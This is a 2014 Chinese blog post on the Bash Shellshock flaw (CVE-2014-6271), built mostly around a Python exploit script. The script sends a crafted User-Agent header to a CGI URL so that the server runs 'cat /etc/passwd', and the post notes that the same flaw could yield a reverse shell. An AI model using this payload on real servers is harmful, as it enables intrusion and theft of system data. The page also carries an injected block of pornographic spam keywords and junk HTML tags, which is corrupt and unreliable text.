<rt id="bn8ez"></rt>

<label id="bn8ez"></label>

<span id="bn8ez"></span>

<label id="bn8ez"><meter id="bn8ez"></meter></label>

<delect id="qmsqa"></delect>

<cite id="qmsqa"></cite>

<button id="qmsqa"><dl id="qmsqa"></dl></button><button id="qmsqa"><dl id="qmsqa"></dl></button>

<li id="qmsqa"></li>

<rt id="qmsqa"></rt>

<bdo id="qmsqa"><source id="qmsqa"></source></bdo>

<button id="qmsqa"></button>

qileilove

blog已經轉移至github,大家請訪問 http://qaseven.github.io/

Bash遠程命令執行漏洞(CVE-2014-6271)分析利用

　這幾天Bash被爆存在遠程命令執行漏洞(CVE-2014-6271)，昨天參加完isc，晚上回家測試了一下，寫了個python版本的測試小基本，貼上代碼：

#coding:utf-8

import urllib,httplib

import sys,re,urlparse

#author:nx4dm1n

#website:www.nxadmin.com

def bash_exp(url):

urlsp=urlparse.urlparse(url)

hostname=urlsp.netloc

urlpath=urlsp.path

conn=httplib.HTTPConnection(hostname)

headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}

conn.request("GET",urlpath,headers=headers)

res=conn.getresponse()

res=res.getheaders()

for passwdstr in res:

print passwdstr[0]+':'+passwdstr[1]

if __name__=='__main__':

#帶http

if len(sys.argv)<2:

print "Usage: "+sys.argv[0]+"www.nxadmin.com/cgi-bin/index.cgi"

sys.exit()

else:

bash_exp(sys.argv[1])

　　腳本執行效果如圖所示：

　　bash命令執行

　　也可以用burp進行測試。

　　利用該漏洞其實可以做很多事情，寫的python小腳本只是執行了cat /etc/passwd?？梢詧绦蟹聪蜴溄拥拿畹?，直接獲取一個shell還是有可能的。不過漏洞存在的條件也比較苛刻，測試找了一些，發現了很少幾個存在漏洞。

posted on 2014-11-26 14:20 順其自然EVO 閱讀(533) 評論(0) 編輯收藏所屬分類: 測試學習專欄、安全性測試

新用戶注冊刷新評論列表


只有注冊用戶登錄后才能發表評論。




網站導航: 博客園 IT新聞 Chat2DB C++博客博問管理
相關文章: 如何進行Web服務的性能測試？利用drozer進行Android滲透測試 Appium Android Bootstrap源碼分析之命令解析執行 Fliptest—iOS 的應用A/B測試框架 iOS功能測試工具 Frank iOS單元測試框架Kiwi for iOS Appium Android Bootstrap之控件AndroidElement 移動應用測試框架—Calabash Android 簡介 Appium Server源碼分析之作為Bootstrap客戶端移植MonkeyRunner的圖片對比功能實現-Appium篇

2014年11月

日

一

二

三

四

五

六

26

27

28

29

30

31

1

2

5

8

9

15

16

20

22

23

25

29

30

1

2

3

4

5

6

導航

統計

隨筆 - 3936
文章 - 404
評論 - 179
引用 - 0

常用鏈接

留言簿(55)

隨筆分類

隨筆檔案

文章分類

文章檔案

搜索

最新評論

1.?re: 關于Loadrunner12的測試總結
@雪
我也碰到了類似問題，請問你的問題解決了嗎？
-- 萬
2.?re: 使用 JUnit 進行 Java 代碼的單元測試[未登錄]
test
--carry
3.?re: 一個軟件測試工程師的成長日記（連載一）[未登錄]
真好
--哈哈
4.?re: 移動端與服務器端數據庫同步
這個到底是怎么弄呢？期待更詳細的內容
--大太陽
5.?re: 移動端與服務器端數據庫同步
dwd
--ののswd

閱讀排行榜

評論排行榜

主站蜘蛛池模板：国产美女做a免费视频软件| 午夜福利不卡片在线播放免费| 免费人成年激情视频在线观看| 日韩亚洲国产综合高清| 在线观看AV片永久免费| 99久久婷婷国产综合亚洲| 日韩精品无码区免费专区| 亚洲人片在线观看天堂无码| 日韩一级视频免费观看| 爱爱帝国亚洲一区二区三区| 免费A级毛片在线播放不收费| 免费在线观看一区| 国产精品V亚洲精品V日韩精品| 国产裸体美女永久免费无遮挡| 亚洲色精品vr一区二区三区| 国产免费拔擦拔擦8X高清在线人 | 中文字幕在线免费| 亚洲校园春色小说| 成人性生交大片免费看午夜a| 亚洲日韩国产欧美一区二区三区| 国产精品免费小视频| a一级毛片免费高清在线| 日本亚洲成高清一区二区三区 | 久久久久亚洲av无码专区| 亚洲一区二区三区免费观看| 亚洲综合偷自成人网第页色| 国产免费直播在线观看视频| 一个人看www免费高清字幕| 亚洲五月六月丁香激情| 好爽又高潮了毛片免费下载 | 亚洲AV色吊丝无码| 亚洲国产精品人人做人人爱| 无码中文字幕av免费放dvd| 亚洲激情视频图片| 亚洲无线一二三四区手机| 99re在线视频免费观看| 亚洲成a人片在线观看天堂无码 | 亚洲AV成人片色在线观看高潮| 国产免费的野战视频| 特级毛片爽www免费版| 久久亚洲AV无码精品色午夜麻豆|

<center id="womis"><acronym id="womis"></acronym></center>

<li id="womis"></li>

<rt id="womis"><acronym id="womis"></acronym></rt>

<noscript id="womis"></noscript>